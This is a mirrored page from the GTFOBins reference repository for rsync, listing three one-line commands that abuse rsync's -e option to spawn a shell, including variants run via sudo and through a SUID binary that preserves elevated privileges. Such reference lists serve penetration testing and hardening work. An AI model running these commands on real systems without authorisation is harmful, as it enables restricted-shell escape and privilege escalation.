1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-27 01:26:05 +02:00
GTFOBins.github.io/_gtfobins/rsync.md

249 B

functions
shell sudo suid
code
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
code
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
code
./rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null